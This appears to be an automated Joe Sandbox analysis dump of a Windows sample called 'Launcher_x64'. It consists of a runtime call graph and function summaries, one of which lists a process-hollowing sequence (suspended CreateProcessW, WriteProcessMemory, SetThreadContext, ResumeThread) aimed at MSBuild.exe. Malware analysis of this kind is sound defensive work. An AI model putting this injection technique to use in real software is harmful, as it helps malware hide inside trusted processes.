Concurrency::cancel_current_task RaiseException 17881->17885 17886 d64e94 17881->17886 17883 d671d1 _ValidateLocalCookies 5 API calls 17882->17883 17884 d618d9 17883->17884 17884->17730 17885->17886 17887 d64f30 std::ios_base::_Init 38 API calls 17886->17887 17888 d64eef 17887->17888 17889 d64f70 std::ios_base::_Init 30 API calls 17888->17889 17890 d64f04 17889->17890 17891 d6a45c Concurrency::cancel_current_task RaiseException 17890->17891 17891->17882 17893 d66982 17892->17893 17894 d635f0 39 API calls 17893->17894 17895 d6698a 17893->17895 17894->17895 17895->17732 17897 d62159 17896->17897 17900 d6d388 17897->17900 17899 d61b3b 17899->17648 17901 d6d39c _Fputc 17900->17901 17902 d6d3be 17901->17902 17904 d6d3e5 17901->17904 17903 d71ba8 _Fputc 29 API calls 17902->17903 17906 d6d3d9 _Fputc 17903->17906 17907 d6eb3d 17904->17907 17906->17899 17908 d6eb49 ___scrt_is_nonwritable_in_current_image 17907->17908 17909 d6d13f _Ungetc EnterCriticalSection 17908->17909 17910 d6eb57 17909->17910 17911 d6e512 79 API calls 17910->17911 17912 d6eb64 17911->17912 17913 d6eb8c LeaveCriticalSection 17912->17913 17914 d6eb75 17913->17914 17914->17906 17917 d62244 std::ios_base::_Init 17915->17917 17916 d613d2 17916->17597 17917->17916 17919 d62320 17917->17919 17922 d62350 17919->17922 17921 d62344 17921->17916 17923 d6237b std::ios_base::_Ios_base_dtor 17922->17923 17924 d62369 17922->17924 17923->17921 17925 d623a0 std::ios_base::_Init 29 API calls 17924->17925 17925->17923 17927 d6f303 17926->17927 17928 d6f2f1 17926->17928 17938 d6f45e 17927->17938 17930 d69a20 std::locale::_Setgloballocale GetModuleHandleW 17928->17930 17933 d6f2f6 17930->17933 17931 d6a2cb 17931->16571 17933->17927 17953 d6f1f8 GetModuleHandleExW 17933->17953 17939 d6f46a ___scrt_is_nonwritable_in_current_image 17938->17939 17959 d71d11 EnterCriticalSection 17939->17959 17941 d6f474 17960 d6f35b 17941->17960 17943 d6f481 17964 d6f49f 17943->17964 17946 d6f293 17989 d6f27a 17946->17989 17948 d6f29d 17949 d6f2b1 17948->17949 17950 d6f2a1 GetCurrentProcess TerminateProcess 17948->17950 17951 d6f1f8 std::locale::_Setgloballocale 3 API calls 17949->17951 17950->17949 17952 d6f2b9 ExitProcess 17951->17952 17954 d6f237 GetProcAddress 17953->17954 17955 d6f258 17953->17955 17954->17955 17956 d6f24b 17954->17956 17957 d6f267 17955->17957 17958 d6f25e FreeLibrary 17955->17958 17956->17955 17957->17927 17958->17957 17959->17941 17962 d6f367 ___scrt_is_nonwritable_in_current_image std::locale::_Setgloballocale 17960->17962 17961 d6f3cb std::locale::_Setgloballocale 17961->17943 17962->17961 17967 d7102e 17962->17967 17988 d71d28 LeaveCriticalSection 17964->17988 17966 d6f33a 17966->17931 17966->17946 17968 d7103a __EH_prolog3 17967->17968 17971 d712b9 17968->17971 17970 d71061 std::ios_base::_Init 17970->17961 17972 d712c5 ___scrt_is_nonwritable_in_current_image 17971->17972 17979 d71d11 EnterCriticalSection 17972->17979 17974 d712d3 17980 d71184 17974->17980 17979->17974 17981 d711a3 17980->17981 17982 d7119b 17980->17982 17981->17982 17983 d756b7 ___free_lconv_mon 14 API calls 17981->17983 17984 d71308 17982->17984 17983->17982 17987 d71d28 LeaveCriticalSection 17984->17987 17986 d712f1 17986->17970 17987->17986 17988->17966 17992 d78f4a 17989->17992 17991 d6f27f std::locale::_Setgloballocale 17991->17948 17993 d78f59 std::locale::_Setgloballocale 17992->17993 17994 d78f66 17993->17994 17996 d765c0 17993->17996 17994->17991 17997 d7670d std::_Locinfo::_Locinfo_dtor 5 API calls 17996->17997 17998 d765dc 17997->17998 17998->17994 18000 d6d0cf ___scrt_uninitialize_crt 17999->18000 18001 d6d0bd 17999->18001 18000->16565 18002 d6d0cb 18001->18002 18004 d7217a 18001->18004 18002->16565 18007 d722a5 18004->18007 18010 d7237e 18007->18010 18011 d7238a ___scrt_is_nonwritable_in_current_image 18010->18011 18018 d71d11 EnterCriticalSection 18011->18018 18013 d72400 18027 d7241e 18013->18027 18014 d72394 ___scrt_uninitialize_crt 18014->18013 18019 d722f2 18014->18019 18018->18014 18020 d722fe ___scrt_is_nonwritable_in_current_image 18019->18020 18030 d6d13f EnterCriticalSection 18020->18030 18022 d72341 18042 d72372 18022->18042 18023 d72308 ___scrt_uninitialize_crt 18023->18022 18031 d72183 18023->18031 18143 d71d28 LeaveCriticalSection 18027->18143 18029 d72181 18029->18002 18030->18023 18032 d72198 _Fputc 18031->18032 18033 d7219f 18032->18033 18034 d721aa 18032->18034 18035 d722a5 ___scrt_uninitialize_crt 77 API calls 18033->18035 18045 d721e8 18034->18045 18039 d721a5 _Fputc 18035->18039 18039->18022 18142 d6d153 LeaveCriticalSection 18042->18142 18044 d72360 18044->18014 18046 d721b4 18045->18046 18047 d72201 18045->18047 18046->18039 18047->18046 18142->18044 18143->18029 18951 d77041 18952 d7705c ___scrt_is_nonwritable_in_current_image 18951->18952 18963 d71d11 EnterCriticalSection 18952->18963 18954 d77063 18964 d7cf7a 18954->18964 18957 d77081 18983 d770a7 18957->18983 18962 d77192 2 API calls 18962->18957 18963->18954 18965 d7cf86 ___scrt_is_nonwritable_in_current_image 18964->18965 18966 d7cfb0 18965->18966 18967 d7cf8f 18965->18967 18986 d71d11 EnterCriticalSection 18966->18986 18968 d71314 __strnicoll 14 API calls 18967->18968 18970 d7cf94 18968->18970 18971 d719ff __strnicoll 29 API calls 18970->18971 18972 d77072 18971->18972 18972->18957 18977 d770dc GetStartupInfoW 18972->18977 18973 d7cfe8 18994 d7d00f 18973->18994 18975 d7cfbc 18975->18973 18987 d7ceca 18975->18987 18978 d7707c 18977->18978 18979 d770f9 18977->18979 18978->18962 18979->18978 18980 d7cf7a 30 API calls 18979->18980 18981 d77121 18980->18981 18981->18978 18982 d77151 GetFileType 18981->18982 18982->18981 18998 d71d28 LeaveCriticalSection 18983->18998 18985 d77092 18986->18975 18988 d769f4 __Getctype 14 API calls 18987->18988 18990 d7cedc 18988->18990 18989 d7cee9 18991 d756b7 ___free_lconv_mon 14 API calls 18989->18991 18990->18989 18992 d76470 6 API calls 18990->18992 18993 d7cf3e 18991->18993 18992->18990 18993->18975 18997 d71d28 LeaveCriticalSection 18994->18997 18996 d7d016 18996->18972 18997->18996 18998->18985 18999 d6d240 19000 d7217a ___scrt_uninitialize_crt 77 API calls 18999->19000 19001 d6d248 19000->19001 19009 d77ef2 19001->19009 19003 d6d24d 19019 d77f9d 19003->19019 19006 d6d277 19007 d756b7 ___free_lconv_mon 14 API calls 19006->19007 19008 d6d282 19007->19008 19010 d77efe ___scrt_is_nonwritable_in_current_image 19009->19010 19023 d71d11 EnterCriticalSection 19010->19023 19012 d77f75 19028 d77f94 19012->19028 19015 d77f09 19015->19012 19016 d77f49 DeleteCriticalSection 19015->19016 19024 d71fd2 19015->19024 19018 d756b7 ___free_lconv_mon 14 API calls 19016->19018 19018->19015 19020 d77fb4 19019->19020 19021 d6d25c DeleteCriticalSection 19019->19021 19020->19021 19022 d756b7 ___free_lconv_mon 14 API calls 19020->19022 19021->19003 19021->19006 19022->19021 19023->19015 19025 d71fe5 _Fputc 19024->19025 19031 d72090 19025->19031 19027 d71ff1 _Fputc 19027->19015 19103 d71d28 LeaveCriticalSection 19028->19103 19030 d77f81 19030->19003 19032 d7209c ___scrt_is_nonwritable_in_current_image 19031->19032 19033 d720a6 19032->19033 19034 d720c9 19032->19034 19035 d71ba8 _Fputc 29 API calls 19033->19035 19036 d720c1 19034->19036 19042 d6d13f EnterCriticalSection 19034->19042 19035->19036 19036->19027 19038 d720e7 19043 d72002 19038->19043 19040 d720f4 19057 d7211f 19040->19057 19042->19038 19044 d72032 19043->19044 19045 d7200f 19043->19045 19047 d721e8 ___scrt_uninitialize_crt 73 API calls 19044->19047 19056 d7202a 19044->19056 19046 d71ba8 _Fputc 29 API calls 19045->19046 19046->19056 19048 d7204a 19047->19048 19049 d77f9d 14 API calls 19048->19049 19050 d72052 19049->19050 19051 d78e44 _Ungetc 29 API calls 19050->19051 19052 d7205e 19051->19052 19060 d7d116 19052->19060 19055 d756b7 ___free_lconv_mon 14 API calls 19055->19056 19056->19040 19102 d6d153 LeaveCriticalSection 19057->19102 19059 d72125 19059->19036 19063 d72065 19060->19063 19064 d7d13f 19060->19064 19061 d7d18e 19062 d71ba8 _Fputc 29 API calls 19061->19062 19062->19063 19063->19055 19063->19056 19064->19061 19065 d7d166 19064->19065 19067 d7d1b9 19065->19067 19068 d7d1c5 ___scrt_is_nonwritable_in_current_image 19067->19068 19075 d7d018 EnterCriticalSection 19068->19075 19070 d7d1d3 19071 d7d204 19070->19071 19076 d7d076 19070->19076 19089 d7d23e 19071->19089 19075->19070 19077 d7cdcf _Fputc 29 API calls 19076->19077 19078 d7d086 19077->19078 19079 d7d08c 19078->19079 19081 d7cdcf _Fputc 29 API calls 19078->19081 19087 d7d0be 19078->19087 19092 d7ce39 19079->19092 19083 d7d0b5 19081->19083 19082 d7cdcf _Fputc 29 API calls 19084 d7d0ca CloseHandle 19082->19084 19085 d7cdcf _Fputc 29 API calls 19083->19085 19084->19079 19086 d7d0d6 GetLastError 19084->19086 19085->19087 19086->19079 19087->19079 19087->19082 19088 d7d0e4 _Fputc 19088->19071 19101 d7d03b LeaveCriticalSection 19089->19101 19091 d7d227 19091->19063 19093 d7ceaf 19092->19093 19094 d7ce48 19092->19094 19095 d71314 __strnicoll 14 API calls 19093->19095 19094->19093 19100 d7ce72 19094->19100 19096 d7ceb4 19095->19096 19097 d71327 __dosmaperr 14 API calls 19096->19097 19098 d7ce9f 19097->19098 19098->19088 19099 d7ce99 SetStdHandle 19099->19098 19100->19098 19100->19099 19101->19091 19102->19059 19103->19030 19115 d7304b 19116 d7305e _Fputc 19115->19116 19119 d730b8 19116->19119 19118 d73073 _Fputc 19120 d730ed 19119->19120 19121 d730ca 19119->19121 19120->19121 19124 d73114 19120->19124 19122 d71ba8 _Fputc 29 API calls 19121->19122 19123 d730e5 19122->19123 19123->19118 19127 d731ee 19124->19127 19128 d731fa ___scrt_is_nonwritable_in_current_image 19127->19128 19135 d6d13f EnterCriticalSection 19128->19135 19130 d73208 19136 d7314e 19130->19136 19132 d73215 19145 d7323d 19132->19145 19135->19130 19137 d721e8 ___scrt_uninitialize_crt 73 API calls 19136->19137 19138 d73169 19137->19138 19139 d77f9d 14 API calls 19138->19139 19140 d73173 19139->19140 19141 d769f4 __Getctype 14 API calls 19140->19141 19144 d7318e 19140->19144 19142 d731b2 19141->19142 19143 d756b7 ___free_lconv_mon 14 API calls 19142->19143 19143->19144 19144->19132 19148 d6d153 LeaveCriticalSection 19145->19148 19147 d7314c 19147->19118 19148->19147 19355 d68a60 19356 d68a82 19355->19356 19360 d68a97 19355->19360 19361 d68bf5 19356->19361 19364 d68c10 19361->19364 19365 d68c61 19361->19365 19362 d671d1 _ValidateLocalCookies 5 API calls 19363 d68a87 19362->19363 19363->19360 19367 d72a79 19363->19367 19364->19365 19366 d72ab4 78 API calls 19364->19366 19365->19362 19366->19365 19368 d72a84 19367->19368 19369 d72a99 19367->19369 19371 d71314 __strnicoll 14 API calls 19368->19371 19369->19368 19370 d72aa0 19369->19370 19377 d713c4 19370->19377 19373 d72a89 19371->19373 19374 d719ff __strnicoll 29 API calls 19373->19374 19376 d72a94 19374->19376 19375 d72aaf 19375->19360 19376->19360 19378 d713d7 _Fputc 19377->19378 19381 d7163d 19378->19381 19380 d713ec _Fputc 19380->19375 19383 d71649 ___scrt_is_nonwritable_in_current_image 19381->19383 19382 d7164f 19384 d71ba8 _Fputc 29 API calls 19382->19384 19383->19382 19386 d71692 19383->19386 19385 d7166a 19384->19385 19385->19380 19392 d6d13f EnterCriticalSection 19386->19392 19388 d7169e 19393 d71551 19388->19393 19390 d716b4 19404 d716dd 19390->19404 19392->19388 19394 d71577 19393->19394 19395 d71564 19393->19395 19407 d71478 19394->19407 19395->19390 19397 d7159a 19398 d71628 19397->19398 19399 d715b5 19397->19399 19411 d7c36c 19397->19411 19398->19390 19400 d721e8 ___scrt_uninitialize_crt 73 API calls 19399->19400 19402 d715c8 19400->19402 19425 d7c152 19402->19425 19476 d6d153 LeaveCriticalSection 19404->19476 19406 d716e5 19406->19385 19408 d71489 19407->19408 19410 d714e1 19407->19410 19408->19410 19428 d7c112 19408->19428 19410->19397 19412 d7c73e 19411->19412 19413 d7c775 19412->19413 19414 d7c74d 19412->19414 19415 d78e44 _Ungetc 29 API calls 19413->19415 19416 d71ba8 _Fputc 29 API calls 19414->19416 19417 d7c77e 19415->19417 19418 d7c768 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 19416->19418 19438 d7c170 19417->19438 19418->19399 19421 d7c83f 19421->19418 19453 d7c573 19421->19453 19422 d7c828 19441 d7c3c8 19422->19441 19426 d7c2b3 _Fputc 31 API calls 19425->19426 19427 d7c16b 19426->19427 19427->19398 19429 d7c126 _Fputc 19428->19429 19432 d7c2b3 19429->19432 19431 d7c13b _Fputc 19431->19410 19433 d7cdcf _Fputc 29 API calls 19432->19433 19434 d7c2c5 19433->19434 19435 d7c2e1 SetFilePointerEx 19434->19435 19437 d7c2cd _Fputc 19434->19437 19436 d7c2f9 GetLastError 19435->19436 19435->19437 19436->19437 19437->19431 19460 d7c18e 19438->19460 19442 d7c3d7 _Fputc 19441->19442 19443 d78e44 _Ungetc 29 API calls 19442->19443 19445 d7c3f3 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 19443->19445 19444 d671d1 _ValidateLocalCookies 5 API calls 19446 d7c571 19444->19446 19447 d7c170 33 API calls 19445->19447 19452 d7c3ff 19445->19452 19446->19418 19448 d7c453 19447->19448 19449 d7c485 ReadFile 19448->19449 19448->19452 19450 d7c4ac 19449->19450 19449->19452 19451 d7c170 33 API calls 19450->19451 19451->19452 19452->19444 19454 d78e44 _Ungetc 29 API calls 19453->19454 19455 d7c586 19454->19455 19456 d7c170 33 API calls 19455->19456 19459 d7c5d0 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 19455->19459 19457 d7c62d 19456->19457 19458 d7c170 33 API calls 19457->19458 19457->19459 19458->19459 19459->19418 19462 d7c19a ___scrt_is_nonwritable_in_current_image 19460->19462 19461 d7c189 19461->19418 19461->19421 19461->19422 19462->19461 19463 d7c1dd 19462->19463 19465 d7c223 19462->19465 19464 d71ba8 _Fputc 29 API calls 19463->19464 19464->19461 19471 d7d018 EnterCriticalSection 19465->19471 19467 d7c229 19468 d7c24a 19467->19468 19469 d7c2b3 _Fputc 31 API calls 19467->19469 19472 d7c2ab 19468->19472 19469->19468 19471->19467 19475 d7d03b LeaveCriticalSection 19472->19475 19474 d7c2b1 19474->19461 19475->19474 19476->19406 19515 d77600 19518 d71d28 LeaveCriticalSection 19515->19518 19517 d77607 19518->19517 21023 d78b36 21024 d78b49 _Fputc 21023->21024 21027 d78b70 21024->21027 21026 d78b5e _Fputc 21028 d78b85 21027->21028 21029 d78bc6 21028->21029 21030 d6d5c0 _Fputc 48 API calls 21028->21030 21035 d78b89 _Fputc std::bad_exception::bad_exception 21028->21035 21036 d78bb2 std::bad_exception::bad_exception 21028->21036 21032 d75801 _Fputc WideCharToMultiByte 21029->21032 21029->21035 21029->21036 21030->21029 21031 d71ba8 _Fputc 29 API calls 21031->21035 21033 d78c81 21032->21033 21034 d78c97 GetLastError 21033->21034 21033->21035 21034->21035 21034->21036 21035->21026 21036->21031 21036->21035 21097 d72127 21098 d72139 21097->21098 21101 d72142 ___scrt_uninitialize_crt 21097->21101 21099 d722a5 ___scrt_uninitialize_crt 77 API calls 21098->21099 21100 d7213f 21099->21100 21102 d72151 21101->21102 21105 d7242a 21101->21105 21106 d72436 ___scrt_is_nonwritable_in_current_image 21105->21106 21113 d6d13f EnterCriticalSection 21106->21113 21108 d72444 21109 d72183 ___scrt_uninitialize_crt 77 API calls 21108->21109 21110 d72455 21109->21110 21114 d7247e 21110->21114 21113->21108 21117 d6d153 LeaveCriticalSection 21114->21117 21116 d72178 21117->21116

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00D90110,00D90100), ref: 00D90334
                                                                                          • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 00D90347
                                                                                          • Wow64GetThreadContext.KERNEL32(0000022C,00000000), ref: 00D90365
                                                                                          • ReadProcessMemory.KERNELBASE(0000009C,?,00D90154,00000004,00000000), ref: 00D90389
                                                                                          • VirtualAllocEx.KERNELBASE(0000009C,?,?,00003000,00000040), ref: 00D903B4
                                                                                          • TerminateProcess.KERNELBASE(0000009C,00000000), ref: 00D903D3
                                                                                          • WriteProcessMemory.KERNELBASE(0000009C,00000000,?,?,00000000,?), ref: 00D9040C
                                                                                          • WriteProcessMemory.KERNELBASE(0000009C,00400000,?,?,00000000,?,00000028), ref: 00D90457
                                                                                          • WriteProcessMemory.KERNELBASE(0000009C,?,?,00000004,00000000), ref: 00D90495
                                                                                          • Wow64SetThreadContext.KERNEL32(0000022C,02E50000), ref: 00D904D1
                                                                                          • ResumeThread.KERNELBASE(0000022C), ref: 00D904E0
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1668332843.0000000000D90000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1668266269.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668287121.0000000000D61000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668314183.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668348190.0000000000D91000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668364933.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668379699.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_d60000_Launcher_x64.jbxd
                                                                                          Similarity
                                                                                          • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResumeTerminate
                                                                                          • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$CreateProcessW$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
                                                                                          • API String ID: 2440066154-3857624555
                                                                                          • Opcode ID: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
                                                                                          • Instruction ID: fa15d7f892c57236d14d70e7af91d412d3658f874760430750d9c317d4432ee1
                                                                                          • Opcode Fuzzy Hash: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
                                                                                          • Instruction Fuzzy Hash: 3BB1F87664064AAFDB60CF68CC80BDA77A5FF88714F158124EA0CAB341D774FA51CBA4

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1668287121.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1668266269.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668314183.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668332843.0000000000D90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668348190.0000000000D91000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668364933.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668379699.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_d60000_Launcher_x64.jbxd
                                                                                          Similarity
                                                                                          • API ID: File$AddressCloseCreateHandleProcSize
                                                                                          • String ID: CreateFileA
                                                                                          • API String ID: 2547132502-1429953656
                                                                                          • Opcode ID: 0bf27c55d3e56102971c61d26ac3a9174ae89d64dec7ab4c08b77edd9f442afb
                                                                                          • Instruction ID: 91d4f7fd6afe5d3ee9a9cae4db60e339a0621f2ccba58caf3f873401b70d58e1
                                                                                          • Opcode Fuzzy Hash: 0bf27c55d3e56102971c61d26ac3a9174ae89d64dec7ab4c08b77edd9f442afb
                                                                                          • Instruction Fuzzy Hash: 844194B4D083099FDB00EFA8D4586AEBBF0EF49314F048529E899A7350D7789545CFA2

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 41 d76642-d7664e 42 d766e0-d766e3 41->42 43 d76653-d76664 42->43 44 d766e9 42->44 46 d76666-d76669 43->46 47 d76671-d7668a LoadLibraryExW 43->47 45 d766eb-d766ef 44->45 48 d7666f 46->48 49 d76709-d7670b 46->49 50 d766f0-d76700 47->50 51 d7668c-d76695 GetLastError 47->51 53 d766dd 48->53 49->45 50->49 52 d76702-d76703 FreeLibrary 50->52 54 d76697-d766a9 call d79d04 51->54 55 d766ce-d766db 51->55 52->49 53->42 54->55 58 d766ab-d766bd call d79d04 54->58 55->53 58->55 61 d766bf-d766cc LoadLibraryExW 58->61 61->50 61->55
                                                                                          APIs
                                                                                          • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,00000000,?,BFBEED24,?,00D76751,00000000,00000000,00000000,00000000), ref: 00D76703
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1668287121.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1668266269.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668314183.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668332843.0000000000D90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668348190.0000000000D91000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668364933.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668379699.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_d60000_Launcher_x64.jbxd
                                                                                          Similarity
                                                                                          • API ID: FreeLibrary
                                                                                          • String ID: api-ms-$ext-ms-
                                                                                          • API String ID: 3664257935-537541572
                                                                                          • Opcode ID: 06dbf40251e1e05748ae9434eb6b76d9ec3a5aabe61c25e758c4bc0d71940ebc
                                                                                          • Instruction ID: 8fea9fe6ccce4fed1752232999deaddf95b6b9aee658ad4e0435180fc54c4167
                                                                                          • Opcode Fuzzy Hash: 06dbf40251e1e05748ae9434eb6b76d9ec3a5aabe61c25e758c4bc0d71940ebc
                                                                                          • Instruction Fuzzy Hash: 26210276A01B25ABC732AB24DC44A5E3368EB417A0F694165FD09E7290FB70ED00DBF0

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1668287121.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1668266269.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668314183.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668332843.0000000000D90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668348190.0000000000D91000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668364933.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668379699.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_d60000_Launcher_x64.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressConsoleFreeHandleModuleProc
                                                                                          • String ID: FreeConsole$kernel32.dll
                                                                                          • API String ID: 1635486814-2564406000
                                                                                          • Opcode ID: 41eeb3a2837fc048ffea5526fb74a231e7d981a3d8609d9e8bb66cb909722715
                                                                                          • Instruction ID: baff1fb42717a0f2906c4aba6ad6156d9f4b886ec8448bace1d34544f7acb431
                                                                                          • Opcode Fuzzy Hash: 41eeb3a2837fc048ffea5526fb74a231e7d981a3d8609d9e8bb66cb909722715
                                                                                          • Instruction Fuzzy Hash: 5B016670E14208AFCB40EFB8D94569DBBF4EB48300F41856AE849D7351EB34A6548FA2

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1668287121.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1668266269.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668314183.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668332843.0000000000D90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668348190.0000000000D91000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668364933.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668379699.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_d60000_Launcher_x64.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressProcProtectVirtual
                                                                                          • String ID: @$VirtualProtect
                                                                                          • API String ID: 3759838892-29487290
                                                                                          • Opcode ID: 3fd6a0ec314ff19c5aeb65eeb08b8845c8a38c7ed2ab61ad3e9edb41d613fcb1
                                                                                          • Instruction ID: 6d1644b195d191c98dce675188c1a3f6ab76d7e3ff1b16903b4e9541f81cf72f
                                                                                          • Opcode Fuzzy Hash: 3fd6a0ec314ff19c5aeb65eeb08b8845c8a38c7ed2ab61ad3e9edb41d613fcb1
                                                                                          • Instruction Fuzzy Hash: 2F41D1B4905309DFDB04DFA9E99869EBBF0FF48318F10841AE858AB350D7759984CFA1

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • GetCurrentProcess.KERNEL32(00D6F1A0,?,00D6F355,00000000,?,?,00D6F1A0,BFBEED24,?,00D6F1A0), ref: 00D6F2A4
                                                                                          • TerminateProcess.KERNEL32(00000000,?,00D6F355,00000000,?,?,00D6F1A0,BFBEED24,?,00D6F1A0), ref: 00D6F2AB
                                                                                          • ExitProcess.KERNEL32 ref: 00D6F2BD
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1668287121.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1668266269.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668314183.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668332843.0000000000D90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668348190.0000000000D91000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668364933.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668379699.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_d60000_Launcher_x64.jbxd
                                                                                          Similarity
                                                                                          • API ID: Process$CurrentExitTerminate
                                                                                          • String ID:
                                                                                          • API String ID: 1703294689-0
                                                                                          • Opcode ID: 8976114c354d3e03acf8cf3110918cd341446842cc7f154b1d340da402899d32
                                                                                          • Instruction ID: 9df1fb0d9ee1bc25008e3c6b834cb4ef129d5ae0dbe0ada00b7fca8f5c774617
                                                                                          • Opcode Fuzzy Hash: 8976114c354d3e03acf8cf3110918cd341446842cc7f154b1d340da402899d32
                                                                                          • Instruction Fuzzy Hash: A6D06C32010608ABCF012FA1EC0995D3F6AEB89391B544024B9199A231CF7599929FB4

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
